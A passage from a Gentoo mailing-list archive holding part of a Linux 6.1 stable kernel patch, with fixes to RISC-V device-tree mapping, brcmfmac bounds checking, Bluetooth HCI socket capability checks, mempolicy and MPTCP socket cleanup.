+-			memcpy(new_dtb_early_va, dtb_early_va, fdt_size);
+-			early_memunmap(new_dtb_early_va, fdt_size);
+-			_dtb_early_pa = new_dtb_early_pa;
+-		} else
+-			memblock_reserve(dtb_early_pa, fdt_totalsize(dtb_early_va));
+-	}
++	if (!IS_ENABLED(CONFIG_BUILTIN_DTB))
++		memblock_reserve(dtb_early_pa, fdt_totalsize(dtb_early_va));
+ 
+ 	dma_contiguous_reserve(dma32_phys_limit);
+ 	if (IS_ENABLED(CONFIG_64BIT))
+@@ -279,9 +269,6 @@ pgd_t trampoline_pg_dir[PTRS_PER_PGD] __page_aligned_bss;
+ static pte_t fixmap_pte[PTRS_PER_PTE] __page_aligned_bss;
+ 
+ pgd_t early_pg_dir[PTRS_PER_PGD] __initdata __aligned(PAGE_SIZE);
+-static p4d_t __maybe_unused early_dtb_p4d[PTRS_PER_P4D] __initdata __aligned(PAGE_SIZE);
+-static pud_t __maybe_unused early_dtb_pud[PTRS_PER_PUD] __initdata __aligned(PAGE_SIZE);
+-static pmd_t __maybe_unused early_dtb_pmd[PTRS_PER_PMD] __initdata __aligned(PAGE_SIZE);
+ 
+ #ifdef CONFIG_XIP_KERNEL
+ #define pt_ops			(*(struct pt_alloc_ops *)XIP_FIXUP(&pt_ops))
+@@ -626,9 +613,6 @@ static void __init create_p4d_mapping(p4d_t *p4dp,
+ #define trampoline_pgd_next	(pgtable_l5_enabled ?			\
+ 		(uintptr_t)trampoline_p4d : (pgtable_l4_enabled ?	\
+ 		(uintptr_t)trampoline_pud : (uintptr_t)trampoline_pmd))
+-#define early_dtb_pgd_next	(pgtable_l5_enabled ?			\
+-		(uintptr_t)early_dtb_p4d : (pgtable_l4_enabled ?	\
+-		(uintptr_t)early_dtb_pud : (uintptr_t)early_dtb_pmd))
+ #else
+ #define pgd_next_t		pte_t
+ #define alloc_pgd_next(__va)	pt_ops.alloc_pte(__va)
+@@ -636,7 +620,6 @@ static void __init create_p4d_mapping(p4d_t *p4dp,
+ #define create_pgd_next_mapping(__nextp, __va, __pa, __sz, __prot)	\
+ 	create_pte_mapping(__nextp, __va, __pa, __sz, __prot)
+ #define fixmap_pgd_next		((uintptr_t)fixmap_pte)
+-#define early_dtb_pgd_next	((uintptr_t)early_dtb_pmd)
+ #define create_p4d_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+ #define create_pud_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+ #define create_pmd_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+@@ -859,32 +842,28 @@ static void __init create_kernel_page_table(pgd_t *pgdir, bool early)
+  * this means 2 PMD entries whereas for 32-bit kernel, this is only 1 PGDIR
+  * entry.
+  */
+-static void __init create_fdt_early_page_table(pgd_t *pgdir, uintptr_t dtb_pa)
++static void __init create_fdt_early_page_table(pgd_t *pgdir,
++					       uintptr_t fix_fdt_va,
++					       uintptr_t dtb_pa)
+ {
+-#ifndef CONFIG_BUILTIN_DTB
+ 	uintptr_t pa = dtb_pa & ~(PMD_SIZE - 1);
+ 
+-	create_pgd_mapping(early_pg_dir, DTB_EARLY_BASE_VA,
+-			   IS_ENABLED(CONFIG_64BIT) ? early_dtb_pgd_next : pa,
+-			   PGDIR_SIZE,
+-			   IS_ENABLED(CONFIG_64BIT) ? PAGE_TABLE : PAGE_KERNEL);
+-
+-	if (pgtable_l5_enabled)
+-		create_p4d_mapping(early_dtb_p4d, DTB_EARLY_BASE_VA,
+-				   (uintptr_t)early_dtb_pud, P4D_SIZE, PAGE_TABLE);
+-
+-	if (pgtable_l4_enabled)
+-		create_pud_mapping(early_dtb_pud, DTB_EARLY_BASE_VA,
+-				   (uintptr_t)early_dtb_pmd, PUD_SIZE, PAGE_TABLE);
++#ifndef CONFIG_BUILTIN_DTB
++	/* Make sure the fdt fixmap address is always aligned on PMD size */
++	BUILD_BUG_ON(FIX_FDT % (PMD_SIZE / PAGE_SIZE));
+ 
+-	if (IS_ENABLED(CONFIG_64BIT)) {
+-		create_pmd_mapping(early_dtb_pmd, DTB_EARLY_BASE_VA,
++	/* In 32-bit only, the fdt lies in its own PGD */
++	if (!IS_ENABLED(CONFIG_64BIT)) {
++		create_pgd_mapping(early_pg_dir, fix_fdt_va,
++				   pa, MAX_FDT_SIZE, PAGE_KERNEL);
++	} else {
++		create_pmd_mapping(fixmap_pmd, fix_fdt_va,
+ 				   pa, PMD_SIZE, PAGE_KERNEL);
+-		create_pmd_mapping(early_dtb_pmd, DTB_EARLY_BASE_VA + PMD_SIZE,
++		create_pmd_mapping(fixmap_pmd, fix_fdt_va + PMD_SIZE,
+ 				   pa + PMD_SIZE, PMD_SIZE, PAGE_KERNEL);
+ 	}
+ 
+-	dtb_early_va = (void *)DTB_EARLY_BASE_VA + (dtb_pa & (PMD_SIZE - 1));
++	dtb_early_va = (void *)fix_fdt_va + (dtb_pa & (PMD_SIZE - 1));
+ #else
+ 	/*
+ 	 * For 64-bit kernel, __va can't be used since it would return a linear
+@@ -1054,7 +1033,8 @@ asmlinkage void __init setup_vm(uintptr_t dtb_pa)
+ 	create_kernel_page_table(early_pg_dir, true);
+ 
+ 	/* Setup early mapping for FDT early scan */
+-	create_fdt_early_page_table(early_pg_dir, dtb_pa);
++	create_fdt_early_page_table(early_pg_dir,
++				    __fix_to_virt(FIX_FDT), dtb_pa);
+ 
+ 	/*
+ 	 * Bootime fixmap only can handle PMD_SIZE mapping. Thus, boot-ioremap
+@@ -1096,6 +1076,16 @@ static void __init setup_vm_final(void)
+ 	u64 i;
+ 
+ 	/* Setup swapper PGD for fixmap */
++#if !defined(CONFIG_64BIT)
++	/*
++	 * In 32-bit, the device tree lies in a pgd entry, so it must be copied
++	 * directly in swapper_pg_dir in addition to the pgd entry that points
++	 * to fixmap_pte.
++	 */
++	unsigned long idx = pgd_index(__fix_to_virt(FIX_FDT));
++
++	set_pgd(&swapper_pg_dir[idx], early_pg_dir[idx]);
++#endif
+ 	create_pgd_mapping(swapper_pg_dir, FIXADDR_START,
+ 			   __pa_symbol(fixmap_pgd_next),
+ 			   PGDIR_SIZE, PAGE_TABLE);
+diff --git a/arch/x86/Makefile.um b/arch/x86/Makefile.um
+index d2e95d1d4db77..1aa64846e5398 100644
+--- a/arch/x86/Makefile.um
++++ b/arch/x86/Makefile.um
+@@ -3,9 +3,14 @@ core-y += arch/x86/crypto/
+ 
+ #
+ # Disable SSE and other FP/SIMD instructions to match normal x86
++# This is required to work around issues in older LLVM versions, but breaks
++# GCC versions < 11. See:
++# https://gcc.gnu.org/bugzilla/show_bug.cgi?id=99652
+ #
++ifeq ($(CONFIG_CC_IS_CLANG),y)
+ KBUILD_CFLAGS += -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx
+ KBUILD_RUSTFLAGS += -Ctarget-feature=-sse,-sse2,-sse3,-ssse3,-sse4.1,-sse4.2,-avx,-avx2
++endif
+ 
+ ifeq ($(CONFIG_X86_32),y)
+ START := 0x8048000
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index c463173f1fb1a..97ab1468a8760 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -718,7 +718,12 @@ static int really_probe_debug(struct device *dev, struct device_driver *drv)
+ 	calltime = ktime_get();
+ 	ret = really_probe(dev, drv);
+ 	rettime = ktime_get();
+-	pr_debug("probe of %s returned %d after %lld usecs\n",
++	/*
++	 * Don't change this to pr_debug() because that requires
++	 * CONFIG_DYNAMIC_DEBUG and we want a simple 'initcall_debug' on the
++	 * kernel commandline to print this all the time at the debug level.
++	 */
++	printk(KERN_DEBUG "probe of %s returned %d after %lld usecs\n",
+ 		 dev_name(dev), ret, ktime_us_delta(rettime, calltime));
+ 	return ret;
+ }
+diff --git a/drivers/gpio/gpiolib-acpi.c b/drivers/gpio/gpiolib-acpi.c
+index fa3de3c3010ce..787d47e667adb 100644
+--- a/drivers/gpio/gpiolib-acpi.c
++++ b/drivers/gpio/gpiolib-acpi.c
+@@ -1600,6 +1600,19 @@ static const struct dmi_system_id gpiolib_acpi_quirks[] __initconst = {
+ 			.ignore_interrupt = "AMDI0030:00@18",
+ 		},
+ 	},
++	{
++		/*
++		 * Spurious wakeups from TP_ATTN# pin
++		 * Found in BIOS 1.7.8
++		 * https://gitlab.freedesktop.org/drm/amd/-/issues/1722#note_1720627
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NL5xNU"),
++		},
++		.driver_data = &(struct acpi_gpiolib_dmi_quirk) {
++			.ignore_wake = "ELAN0415:00@9",
++		},
++	},
+ 	{
+ 		/*
+ 		 * Spurious wakeups from TP_ATTN# pin
+diff --git a/drivers/gpu/drm/drm_fb_helper.c b/drivers/gpu/drm/drm_fb_helper.c
+index 71edb80fe0fb9..06cd2f8c27734 100644
+--- a/drivers/gpu/drm/drm_fb_helper.c
++++ b/drivers/gpu/drm/drm_fb_helper.c
+@@ -1406,6 +1406,9 @@ int drm_fb_helper_check_var(struct fb_var_screeninfo *var,
+ 		return -EINVAL;
+ 	}
+ 
++	var->xres_virtual = fb->width;
++	var->yres_virtual = fb->height;
++
+ 	/*
+ 	 * Workaround for SDL 1.2, which is known to be setting all pixel format
+ 	 * fields values to zero in some cases. We treat this situation as a
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index ea8409e0e70e7..12c4408bbc3b6 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -5888,6 +5888,11 @@ static s32 brcmf_get_assoc_ies(struct brcmf_cfg80211_info *cfg,
+ 		(struct brcmf_cfg80211_assoc_ielen_le *)cfg->extra_buf;
+ 	req_len = le32_to_cpu(assoc_info->req_len);
+ 	resp_len = le32_to_cpu(assoc_info->resp_len);
++	if (req_len > WL_EXTRA_BUF_MAX || resp_len > WL_EXTRA_BUF_MAX) {
++		bphy_err(drvr, "invalid lengths in assoc info: req %u resp %u\n",
++			 req_len, resp_len);
++		return -EINVAL;
++	}
+ 	if (req_len) {
+ 		err = brcmf_fil_iovar_data_get(ifp, "assoc_req_ies",
+ 					       cfg->extra_buf,
+diff --git a/drivers/phy/broadcom/phy-brcm-usb.c b/drivers/phy/broadcom/phy-brcm-usb.c
+index 2bfd78e2d8fd6..7a4c328bac58c 100644
+--- a/drivers/phy/broadcom/phy-brcm-usb.c
++++ b/drivers/phy/broadcom/phy-brcm-usb.c
+@@ -445,9 +445,9 @@ static int brcm_usb_phy_dvr_init(struct platform_device *pdev,
+ 		priv->suspend_clk = NULL;
+ 	}
+ 
+-	priv->wake_irq = platform_get_irq_byname(pdev, "wake");
++	priv->wake_irq = platform_get_irq_byname_optional(pdev, "wake");
+ 	if (priv->wake_irq < 0)
+-		priv->wake_irq = platform_get_irq_byname(pdev, "wakeup");
++		priv->wake_irq = platform_get_irq_byname_optional(pdev, "wakeup");
+ 	if (priv->wake_irq >= 0) {
+ 		err = devm_request_irq(dev, priv->wake_irq,
+ 				       brcm_usb_phy_wake_isr, 0,
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index fc12fee66141f..f05aea57e2d88 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -595,6 +595,11 @@ static void option_instat_callback(struct urb *urb);
+ #define SIERRA_VENDOR_ID			0x1199
+ #define SIERRA_PRODUCT_EM9191			0x90d3
+ 
++/* UNISOC (Spreadtrum) products */
++#define UNISOC_VENDOR_ID			0x1782
++/* TOZED LT70-C based on UNISOC SL8563 uses UNISOC's vendor ID */
++#define TOZED_PRODUCT_LT70C			0x4055
++
+ /* Device flags */
+ 
+ /* Highest interface number which can be used with NCTRL() and RSVD() */
+@@ -2225,6 +2230,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(OPPO_VENDOR_ID, OPPO_PRODUCT_R11, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
+ 	{ } /* Terminating entry */
+ };
+ MODULE_DEVICE_TABLE(usb, option_ids);
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 937b60ae576e0..35e889fe2a95d 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -1658,7 +1658,7 @@ static int get_cur_inode_state(struct send_ctx *sctx, u64 ino, u64 gen)
+ 	int left_ret;
+ 	int right_ret;
+ 	u64 left_gen;
+-	u64 right_gen;
++	u64 right_gen = 0;
+ 	struct btrfs_inode_info info;
+ 
+ 	ret = get_inode_info(sctx->send_root, ino, &info);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 67b2aa552d228..099af8ba6fe54 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -2631,7 +2631,7 @@ int btrfs_init_new_device(struct btrfs_fs_info *fs_info, const char *device_path
+ 	struct super_block *sb = fs_info->sb;
+ 	struct rcu_string *name;
+ 	struct btrfs_fs_devices *fs_devices = fs_info->fs_devices;
+-	struct btrfs_fs_devices *seed_devices;
++	struct btrfs_fs_devices *seed_devices = NULL;
+ 	u64 orig_super_total_bytes;
+ 	u64 orig_super_num_devices;
+ 	int ret = 0;
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index f940395667c82..e132f70a059e8 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -784,70 +784,56 @@ static int vma_replace_policy(struct vm_area_struct *vma,
+ 	return err;
+ }
+ 
+-/* Step 2: apply policy to a range and do splits. */
+-static int mbind_range(struct mm_struct *mm, unsigned long start,
+-		       unsigned long end, struct mempolicy *new_pol)
++/* Split or merge the VMA (if required) and apply the new policy */
++static int mbind_range(struct vma_iterator *vmi, struct vm_area_struct *vma,
++		struct vm_area_struct **prev, unsigned long start,
++		unsigned long end, struct mempolicy *new_pol)
+ {
+-	MA_STATE(mas, &mm->mm_mt, start, start);
+-	struct vm_area_struct *prev;
+-	struct vm_area_struct *vma;
+-	int err = 0;
++	struct vm_area_struct *merged;
++	unsigned long vmstart, vmend;
+ 	pgoff_t pgoff;
++	int err;
+ 
+-	prev = mas_prev(&mas, 0);
+-	if (unlikely(!prev))
+-		mas_set(&mas, start);
++	vmend = min(end, vma->vm_end);
++	if (start > vma->vm_start) {
++		*prev = vma;
++		vmstart = start;
++	} else {
++		vmstart = vma->vm_start;
++	}
+ 
+-	vma = mas_find(&mas, end - 1);
+-	if (WARN_ON(!vma))
++	if (mpol_equal(vma_policy(vma), new_pol))
+ 		return 0;
+ 
+-	if (start > vma->vm_start)
+-		prev = vma;
+-
+-	for (; vma; vma = mas_next(&mas, end - 1)) {
+-		unsigned long vmstart = max(start, vma->vm_start);
+-		unsigned long vmend = min(end, vma->vm_end);
+-
+-		if (mpol_equal(vma_policy(vma), new_pol))
+-			goto next;
+-
+-		pgoff = vma->vm_pgoff +
+-			((vmstart - vma->vm_start) >> PAGE_SHIFT);
+-		prev = vma_merge(mm, prev, vmstart, vmend, vma->vm_flags,
+-				 vma->anon_vma, vma->vm_file, pgoff,
+-				 new_pol, vma->vm_userfaultfd_ctx,
+-				 anon_vma_name(vma));
+-		if (prev) {
+-			/* vma_merge() invalidated the mas */
+-			mas_pause(&mas);
+-			vma = prev;
+-			goto replace;
+-		}
+-		if (vma->vm_start != vmstart) {
+-			err = split_vma(vma->vm_mm, vma, vmstart, 1);
+-			if (err)
+-				goto out;
+-			/* split_vma() invalidated the mas */
+-			mas_pause(&mas);
+-		}
+-		if (vma->vm_end != vmend) {
+-			err = split_vma(vma->vm_mm, vma, vmend, 0);
+-			if (err)
+-				goto out;
+-			/* split_vma() invalidated the mas */
+-			mas_pause(&mas);
+-		}
+-replace:
+-		err = vma_replace_policy(vma, new_pol);
++	pgoff = vma->vm_pgoff + ((vmstart - vma->vm_start) >> PAGE_SHIFT);
++	merged = vma_merge(vma->vm_mm, *prev, vmstart, vmend, vma->vm_flags,
++			   vma->anon_vma, vma->vm_file, pgoff, new_pol,
++			   vma->vm_userfaultfd_ctx, anon_vma_name(vma));
++	if (merged) {
++		*prev = merged;
++		/* vma_merge() invalidated the mas */
++		mas_pause(&vmi->mas);
++		return vma_replace_policy(merged, new_pol);
++	}
++
++	if (vma->vm_start != vmstart) {
++		err = split_vma(vma->vm_mm, vma, vmstart, 1);
+ 		if (err)
+-			goto out;
+-next:
+-		prev = vma;
++			return err;
++		/* split_vma() invalidated the mas */
++		mas_pause(&vmi->mas);
+ 	}
+ 
+-out:
+-	return err;
++	if (vma->vm_end != vmend) {
++		err = split_vma(vma->vm_mm, vma, vmend, 0);
++		if (err)
++			return err;
++		/* split_vma() invalidated the mas */
++		mas_pause(&vmi->mas);
++	}
++
++	*prev = vma;
++	return vma_replace_policy(vma, new_pol);
+ }
+ 
+ /* Set the process memory policy */
+@@ -1259,6 +1245,8 @@ static long do_mbind(unsigned long start, unsigned long len,
+ 		     nodemask_t *nmask, unsigned long flags)
+ {
+ 	struct mm_struct *mm = current->mm;
++	struct vm_area_struct *vma, *prev;
++	struct vma_iterator vmi;
+ 	struct mempolicy *new;
+ 	unsigned long end;
+ 	int err;
+@@ -1328,7 +1316,13 @@ static long do_mbind(unsigned long start, unsigned long len,
+ 		goto up_out;
+ 	}
+ 
+-	err = mbind_range(mm, start, end, new);
++	vma_iter_init(&vmi, mm, start);
++	prev = vma_prev(&vmi);
++	for_each_vma_range(vmi, vma, end) {
++		err = mbind_range(&vmi, vma, &prev, start, end, new);
++		if (err)
++			break;
++	}
+ 
+ 	if (!err) {
+ 		int nr_failed = 0;
+@@ -1489,10 +1483,8 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		unsigned long, home_node, unsigned long, flags)
+ {
+ 	struct mm_struct *mm = current->mm;
+-	struct vm_area_struct *vma;
++	struct vm_area_struct *vma, *prev;
+ 	struct mempolicy *new;
+-	unsigned long vmstart;
+-	unsigned long vmend;
+ 	unsigned long end;
+ 	int err = -ENOENT;
+ 	VMA_ITERATOR(vmi, mm, start);
+@@ -1521,9 +1513,8 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 	if (end == start)
+ 		return 0;
+ 	mmap_write_lock(mm);
++	prev = vma_prev(&vmi);
+ 	for_each_vma_range(vmi, vma, end) {
+-		vmstart = max(start, vma->vm_start);
+-		vmend   = min(end, vma->vm_end);
+ 		new = mpol_dup(vma_policy(vma));
+ 		if (IS_ERR(new)) {
+ 			err = PTR_ERR(new);
+@@ -1547,7 +1538,7 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		}
+ 
+ 		new->home_node = home_node;
+-		err = mbind_range(mm, vmstart, vmend, new);
++		err = mbind_range(&vmi, vma, &prev, start, end, new);
+ 		mpol_put(new);
+ 		if (err)
+ 			break;
+diff --git a/net/bluetooth/hci_sock.c b/net/bluetooth/hci_sock.c
+index 06581223238c5..f597fe0db9f8f 100644
+--- a/net/bluetooth/hci_sock.c
++++ b/net/bluetooth/hci_sock.c
+@@ -1003,7 +1003,14 @@ static int hci_sock_ioctl(struct socket *sock, unsigned int cmd,
+ 	if (hci_sock_gen_cookie(sk)) {
+ 		struct sk_buff *skb;
+ 
+-		if (capable(CAP_NET_ADMIN))
++		/* Perform careful checks before setting the HCI_SOCK_TRUSTED
++		 * flag. Make sure that not only the current task but also
++		 * the socket opener has the required capability, since
++		 * privileged programs can be tricked into making ioctl calls
++		 * on HCI sockets, and the socket should not be marked as
++		 * trusted simply because the ioctl caller is privileged.
++		 */
++		if (sk_capable(sk, CAP_NET_ADMIN))
+ 			hci_sock_set_flag(sk, HCI_SOCK_TRUSTED);
+ 
+ 		/* Send event to monitor */
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index b1bbb0b75a13c..ea46a5cb1c30f 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2330,7 +2330,26 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 			      unsigned int flags)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+-	bool need_push, dispose_it;
++	bool dispose_it, need_push = false;
++
++	/* If the first subflow moved to a close state before accept, e.g. due
++	 * to an incoming reset, mptcp either:
++	 * - if either the subflow or the msk are dead, destroy the context
++	 *   (the subflow socket is deleted by inet_child_forget) and the msk
++	 * - otherwise do nothing at the moment and take action at accept and/or
++	 *   listener shutdown - user-space must be able to accept() the closed
++	 *   socket.
++	 */
++	if (msk->in_accept_queue && msk->first == ssk) {
++		if (!sock_flag(sk, SOCK_DEAD) && !sock_flag(ssk, SOCK_DEAD))
++			return;
++
++		/* ensure later check in mptcp_worker() will dispose the msk */
++		sock_set_flag(sk, SOCK_DEAD);
++		lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
++		mptcp_subflow_drop_ctx(ssk);
++		goto out_release;
++	}
+ 
+ 	dispose_it = !msk->subflow || ssk != msk->subflow->sk;
+ 	if (dispose_it)
+@@ -2366,25 +2385,21 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	if (!inet_csk(ssk)->icsk_ulp_ops) {
+ 		WARN_ON_ONCE(!sock_flag(ssk, SOCK_DEAD));
+ 		kfree_rcu(subflow, rcu);
+-	} else if (msk->in_accept_queue && msk->first == ssk) {
+-		/* if the first subflow moved to a close state, e.g. due to
+-		 * incoming reset and we reach here before inet_child_forget()
+-		 * the TCP stack could later try to close it via
+-		 * inet_csk_listen_stop(), or deliver it to the user space via
+-		 * accept().
+-		 * We can't delete the subflow - or risk a double free - nor let
+-		 * the msk survive - or will be leaked in the non accept scenario:
+-		 * fallback and let TCP cope with the subflow cleanup.
+-		 */
+-		WARN_ON_ONCE(sock_flag(ssk, SOCK_DEAD));
+-		mptcp_subflow_drop_ctx(ssk);
+ 	} else {
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
++		if (ssk->sk_state == TCP_LISTEN) {
++			tcp_set_state(ssk, TCP_CLOSE);
++			mptcp_subflow_queue_clean(sk, ssk);
++			inet_csk_listen_stop(ssk);
++		}
++
+ 		__tcp_close(ssk, 0);
+ 
+ 		/* close acquired an extra ref */
+ 		__sock_put(ssk);
+ 	}
++
++out_release:
+ 	release_sock(ssk);
+ 
+ 	sock_put(ssk);
+@@ -2439,21 +2454,14 @@ static void __mptcp_close_subflow(struct sock *sk)
+ 		mptcp_close_ssk(sk, ssk, subflow);
+ 	}
+ 
+-	/* if the MPC subflow has been closed before the msk is accepted,
+-	 * msk will never be accept-ed, close it now
+-	 */
+-	if (!msk->first && msk->in_accept_queue) {
+-		sock_set_flag(sk, SOCK_DEAD);
+-		inet_sk_state_store(sk, TCP_CLOSE);
+-	}
+ }
+ 
+-static bool mptcp_check_close_timeout(const struct sock *sk)
++static bool mptcp_should_close(const struct sock *sk)
+ {
+ 	s32 delta = tcp_jiffies32 - inet_csk(sk)->icsk_mtup.probe_timestamp;
+ 	struct mptcp_subflow_context *subflow;
+ 
+-	if (delta >= TCP_TIMEWAIT_LEN)
++	if (delta >= TCP_TIMEWAIT_LEN || mptcp_sk(sk)->in_accept_queue)
+ 		return true;
+ 
+ 	/* if all subflows are in closed status don't bother with additional
+@@ -2661,7 +2669,7 @@ static void mptcp_worker(struct work_struct *work)
+ 	 * even if it is orphaned and in FIN_WAIT2 state
+ 	 */
+ 	if (sock_flag(sk, SOCK_DEAD)) {
+-		if (mptcp_check_close_timeout(sk)) {
++		if (mptcp_should_close(sk)) {
+ 			inet_sk_state_store(sk, TCP_CLOSE);
+ 			mptcp_do_fastclose(sk);
+ 		}
+@@ -2906,6 +2914,14 @@ static void __mptcp_destroy_sock(struct sock *sk)
+ 	sock_put(sk);
+ }
+ 
++void __mptcp_unaccepted_force_close(struct sock *sk)
++{
++	sock_set_flag(sk, SOCK_DEAD);
++	inet_sk_state_store(sk, TCP_CLOSE);
++	mptcp_do_fastclose(sk);
++	__mptcp_destroy_sock(sk);
++}
++
+ static __poll_t mptcp_check_readable(struct mptcp_sock *msk)
+ {
+ 	/* Concurrent splices from sk_receive_queue into receive_queue will
+@@ -3753,6 +3769,18 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 			if (!ssk->sk_socket)
+ 				mptcp_sock_graft(ssk, newsock);
+ 		}
++
++		/* Do late cleanup for the first subflow as necessary. Also
++		 * deal with bad peers not doing a complete shutdown.
++		 */
++		if (msk->first &&
++		    unlikely(inet_sk_state_load(msk->first) == TCP_CLOSE)) {
++			__mptcp_close_ssk(newsk, msk->first,
++					  mptcp_subflow_ctx(msk->first), 0);
++			if (unlikely(list_empty(&msk->conn_list)))
++				inet_sk_state_store(newsk, TCP_CLOSE);
++		}
++
+ 		release_sock(newsk);
+ 	}
+ 
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 051e8022d6611..441feeaeb2427 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -615,10 +615,12 @@ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow);
+ void __mptcp_subflow_send_ack(struct sock *ssk);
+ void mptcp_subflow_reset(struct sock *ssk);
++void mptcp_subflow_queue_clean(struct sock *sk, struct sock *ssk);
+ void mptcp_sock_graft(struct sock *sk, struct socket *parent);
+ struct socket *__mptcp_nmpc_socket(const struct mptcp_sock *msk);
+ bool __mptcp_close(struct sock *sk, long timeout);
+ void mptcp_cancel_work(struct sock *sk);
++void __mptcp_unaccepted_force_close(struct sock *sk);
+ 
+ bool mptcp_addresses_equal(const struct mptcp_addr_info *a,
+ 			   const struct mptcp_addr_info *b, bool use_port);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 125d1f58d6a43..67ddbf6f2e4ee 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -661,9 +661,12 @@ void mptcp_subflow_drop_ctx(struct sock *ssk)
+ 	if (!ctx)
+ 		return;
+ 
+-	subflow_ulp_fallback(ssk, ctx);
+-	if (ctx->conn)
+-		sock_put(ctx->conn);
++	list_del(&mptcp_subflow_ctx(ssk)->node);
++	if (inet_csk(ssk)->icsk_ulp_ops) {
++		subflow_ulp_fallback(ssk, ctx);
++		if (ctx->conn)
++			sock_put(ctx->conn);
++	}
+ 
+ 	kfree_rcu(ctx, rcu);
+ }
+@@ -1758,6 +1761,77 @@ static void subflow_state_change(struct sock *sk)
+ 	}
+ }
+ 
++void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
++{
++	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
++	struct mptcp_sock *msk, *next, *head = NULL;
++	struct request_sock *req;
++	struct sock *sk;
++
++	/* build a list of all unaccepted mptcp sockets */
++	spin_lock_bh(&queue->rskq_lock);
++	for (req = queue->rskq_accept_head; req; req = req->dl_next) {
++		struct mptcp_subflow_context *subflow;
++		struct sock *ssk = req->sk;
++
++		if (!sk_is_mptcp(ssk))
++			continue;
++
++		subflow = mptcp_subflow_ctx(ssk);
++		if (!subflow || !subflow->conn)
++			continue;
++
++		/* skip if already in list */
++		sk = subflow->conn;
++		msk = mptcp_sk(sk);
++		if (msk->dl_next || msk == head)
++			continue;
++
++		sock_hold(sk);
++		msk->dl_next = head;
++		head = msk;
++	}
++	spin_unlock_bh(&queue->rskq_lock);
++	if (!head)
++		return;
++
++	/* can't acquire the msk socket lock under the subflow one,
++	 * or will cause ABBA deadlock
++	 */
++	release_sock(listener_ssk);
++
++	for (msk = head; msk; msk = next) {
++		sk = (struct sock *)msk;
++
++		lock_sock_nested(sk, SINGLE_DEPTH_NESTING);
++		next = msk->dl_next;
++		msk->dl_next = NULL;
++
++		__mptcp_unaccepted_force_close(sk);
++		release_sock(sk);
++
++		/* lockdep will report a false positive ABBA deadlock
++		 * between cancel_work_sync and the listener socket.
++		 * The involved locks belong to different sockets WRT
++		 * the existing AB chain.
++		 * Using a per socket key is problematic as key
++		 * deregistration requires process context and must be
++		 * performed at socket disposal time, in atomic
++		 * context.
++		 * Just tell lockdep to consider the listener socket
++		 * released here.
++		 */
++		mutex_release(&listener_sk->sk_lock.dep_map, _RET_IP_);
++		mptcp_cancel_work(sk);
++		mutex_acquire(&listener_sk->sk_lock.dep_map, 0, 0, _RET_IP_);
++
++		sock_put(sk);
++	}
++
++	/* we are still under the listener msk socket lock */
++	lock_sock_nested(listener_ssk, SINGLE_DEPTH_NESTING);
++}
++
+ static int subflow_ulp_init(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-04-26 13:19 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-04-26 13:19 UTC (permalink / raw
  To: gentoo-commits

commit:     9d02faaed4123c2992080e3366d6b7caa044c9ce
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Apr 26 13:19:39 2023 +0000
